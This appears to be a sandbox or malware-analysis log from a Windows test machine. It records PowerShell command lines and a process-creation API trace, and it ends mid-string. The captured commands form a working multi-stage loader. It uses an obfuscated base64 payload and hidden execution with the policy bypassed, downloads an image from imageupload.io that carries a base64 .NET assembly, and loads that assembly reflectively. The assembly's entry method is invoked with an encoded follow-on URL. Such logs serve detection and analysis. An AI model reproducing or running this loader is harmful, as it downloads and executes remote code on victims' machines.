cmdline powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('PzXsYGN','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm9hbGloc2FtLzEyMS43Mi40MTIuNTkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2632
thread_handle: 0x000002e8
process_identifier: 2628
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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